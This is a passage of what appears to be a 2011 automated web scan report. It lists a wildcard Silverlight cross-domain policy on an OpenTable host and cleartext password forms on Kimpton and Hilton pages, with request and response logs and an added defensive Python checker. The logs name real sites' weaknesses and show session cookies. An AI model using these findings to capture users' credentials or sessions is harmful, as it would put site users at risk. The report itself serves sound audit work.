6.8. http://o.opentable.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.opentable.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Omniture DC/2.0.0
xserver: www383
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password
There are 18 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (TLS; the obsolete SSL protocol versions should no longer be offered) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP. The page that delivers the login form must itself be served over HTTPS as well: a form fetched over clear-text HTTP can be rewritten in transit to point at an attacker-controlled action URL, even when its original action is an https:// address.
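As an added worked example (this editor's code, not from the XSS.CX report and not Burp's own check), the following Python checker reproduces the core of this issue: it parses a page, resolves every form's action against the page URL, and reports forms that carry a password input but would submit to a non-https URL. It also includes a small Set-Cookie check for the missing secure flag mentioned in the remediation. The sample HTML fragments are constructed, cut down from the Kimpton and Hilton forms quoted in the instances below; the hardened www.example.com form is hypothetical.

```python
"""Find forms that would submit a password over clear-text HTTP, and
Set-Cookie headers that lack the secure flag.  Example code written for this
edit, not part of the report or of Burp."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect each <form>, its resolved action URL and its password inputs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A form with no action submits back to the page's own URL;
            # relative actions inherit the page's scheme and host.
            self._current = {
                "action": urljoin(self.page_url, a.get("action") or self.page_url),
                "method": (a.get("method") or "get").upper(),
                "password_fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password_fields"].append(a.get("name") or a.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url, html):
    """Forms containing a password input whose resolved action is not https://."""
    scanner = _FormScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return [f for f in scanner.forms
            if f["password_fields"] and urlsplit(f["action"]).scheme != "https"]


def cookie_lacks_secure(set_cookie_value):
    """True when a Set-Cookie value carries no Secure attribute."""
    attributes = [part.strip().lower() for part in set_cookie_value.split(";")[1:]]
    return "secure" not in attributes


# Constructed samples, cut down from the forms quoted in the instances below.
KIMPTON_HTML = ('<form name="inTouchSignInform" method="POST" '
                'action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">'
                '<input type="password" name="strPass" id="kitPw" size="20" />'
                '<input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" />'
                '</form>')
HILTON_HTML = ('<form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">'
               '<input id="PasswordPIN" name="password" type="password" tabindex="5" />'
               '</form>')
# Hypothetical hardened form: an absolute https:// action.
SAFE_HTML = '<form action="https://www.example.com/login" method="post"><input type="password" name="pw" /></form>'


if __name__ == "__main__":
    for url, html in (("http://www.kimptonhotels.com/", KIMPTON_HTML),
                      ("http://www1.hilton.com/en_US/hi/customersupport/index.do", HILTON_HTML),
                      ("https://www.example.com/", SAFE_HTML)):
        for form in cleartext_password_forms(url, html):
            print("%s: %s %s sends %s in clear text"
                  % (url, form["method"], form["action"], form["password_fields"]))
    # Cookie from the www1.hilton.com responses below: no Secure attribute.
    print(cookie_lacks_secure("NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:04 GMT;path=/"))
```

The Hilton form is the instructive case: its action contains the string https:// only inside the dst query parameter, and resolving the action against the page URL shows that the POST itself goes to http://www1.hilton.com/doxch.do, so a substring search for "https" would miss it. A form served over plain HTTP but posting to an https:// action passes this check yet remains exposed, because the page carrying the form can be rewritten in transit; treat the page URL's scheme as a second condition when triaging.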


7.1. http://www.kimptonhotels.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /intouch/InTouchSignInProxy.aspx (resolving to http://www.kimptonhotels.com/intouch/InTouchSignInProxy.aspx). The form contains the following password field: strPass

Request

GET / HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92975


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Kimpton Ho
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...

7.2. http://www.kimptonhotels.com/intouch/KIT_overview.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /intouch/KIT_overview.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /intouch/InTouchSignInProxy.aspx (resolving to http://www.kimptonhotels.com/intouch/InTouchSignInProxy.aspx). The form contains the following password field: strPass

Request

GET /intouch/KIT_overview.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/search.aspx?q=xss&search.x=0&search.y=0&search=Search&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=nonIFrame_frontend&site=default_collection&proxystylesheet=nonIFrame_frontend&filter=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635605933:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.2.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75799


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Kimpton InTouch Guest Rewards and Loyalty Program</title>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...

7.3. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurant-reservations.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /intouch/InTouchSignInProxy.aspx (resolving to http://www.kimptonhotels.com/intouch/InTouchSignInProxy.aspx). The form contains the following password field: strPass

Request

GET /restaurants/restaurant-reservations.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144327


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Gourmet Chef-Driven Restaurants in San Francisco and Major US Cities: Kimpton Hotels</title>
<meta http-equiv
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...

7.4. http://www.kimptonhotels.com/restaurants/restaurants.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /restaurants/restaurants.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /intouch/InTouchSignInProxy.aspx (resolving to http://www.kimptonhotels.com/intouch/InTouchSignInProxy.aspx). The form contains the following password field: strPass

Request

GET /restaurants/restaurants.aspx HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/intouch/KIT_overview.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hytzgqaaykmf3c55utfkf3ns; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635611005:ss=1317635583811; __utma=198844469.653864354.1317646382.1317646382.1317646382.1; __utmb=198844469.3.10.1317646382; __utmc=198844469; __utmz=198844469.1317646382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171940


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>
<title>Gourmet Chef
...[SNIP]...
<!-- KIT SIGN-IN -->
<form name="inTouchSignInform" method="POST" action="/intouch/InTouchSignInProxy.aspx" id="inTouchSignInform">

   <ul class="links">
...[SNIP]...
</label>
           <input type="password" name="strPass" id="kitPw" size="20" />
       
           <input type="image" class="submit" src="/assets/btn_miniapp_signin.gif" border="0" alt="Kimpton InTouch Sign In" />
...[SNIP]...

7.5. http://www1.hilton.com/en_US/hi/customersupport/feedback.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/feedback.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. Note that https:// appears only inside the dst query parameter; the POST itself goes to /doxch.do over plain HTTP, so the password crosses the network unencrypted before any redirect to an HTTPS login handler can take place.

Request

GET /en_US/hi/customersupport/feedback.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637043717:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:04 GMT
Content-Length: 36138
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:04 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.6. http://www1.hilton.com/en_US/hi/customersupport/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/customersupport/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:00 GMT;path=/
Content-Length: 35005


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.7. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/local-reservations.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/customersupport/local-reservations.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:38 GMT
Content-Length: 76665
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:38 GMT;path=/


                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.8. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/site-usage.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/customersupport/site-usage.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 69511
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:09:07 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.9. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:07 GMT;path=/
Content-Length: 55346


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.10. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 49011


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.11. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:24 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

7.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: /doxch.do?dst=https://HI/en/hi/PFSLogin (resolving to http://www1.hilton.com/doxch.do?dst=https://HI/en/hi/PFSLogin). The form contains the following password field: password. The https:// scheme appears only inside the dst query parameter; the POST itself travels over plain HTTP.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 84893


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...

